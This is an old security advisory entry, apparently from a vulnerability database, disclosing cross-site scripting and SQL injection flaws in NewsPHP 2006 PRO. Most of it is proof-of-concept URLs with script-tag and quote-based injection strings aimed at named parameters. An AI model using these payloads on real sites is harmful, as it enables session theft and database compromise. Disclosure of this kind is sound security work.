NewsPHP 2006 PRO XSS SQL injection Vulnerability

2006-07-02T00:00:00
ID SECURITYVULNS:DOC:13387
Type securityvulns
Reporter Securityvulns
Modified 2006-07-02T00:00:00

Description

http://newsphp.com

Cross Site Scripting (XSS)

http://target.xx/?words=%3Cscript%3Ealert(/Ellipsis%20Security%20Test/)%3C/script%3E&where=1 http://target.xx/index.php?id=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E http://target.xx/index.php?cat_id='%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E http://target.xx/index.php?cat_id=Business&tim=%22%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E http://target.xx/index.php?tim=%22%3E%3Cscript%3Ealert('Ellipsis%20Security%20Test')%3C/script%3E http://target.xx/index.php?id=%3Cimg%20src=javascript:alert(%22EllipsisSecuritTest%22)%3E


SQL injection

http://target.xx/?words='[SQL] http://target.xx/?words=%27[SQL]&where=1 http://target.xx/index.php?id='[SQL] http://target.xx/index.php?topmenuitem='[SQL] http://target.xx/index.php?cat_id='[SQL] http://target.xx/index.php?words='[SQL]&where=1 http://target.xx/inc/rss_feed.php?category='[SQL]&amount=10


Ellipsis Security http://ellsec.org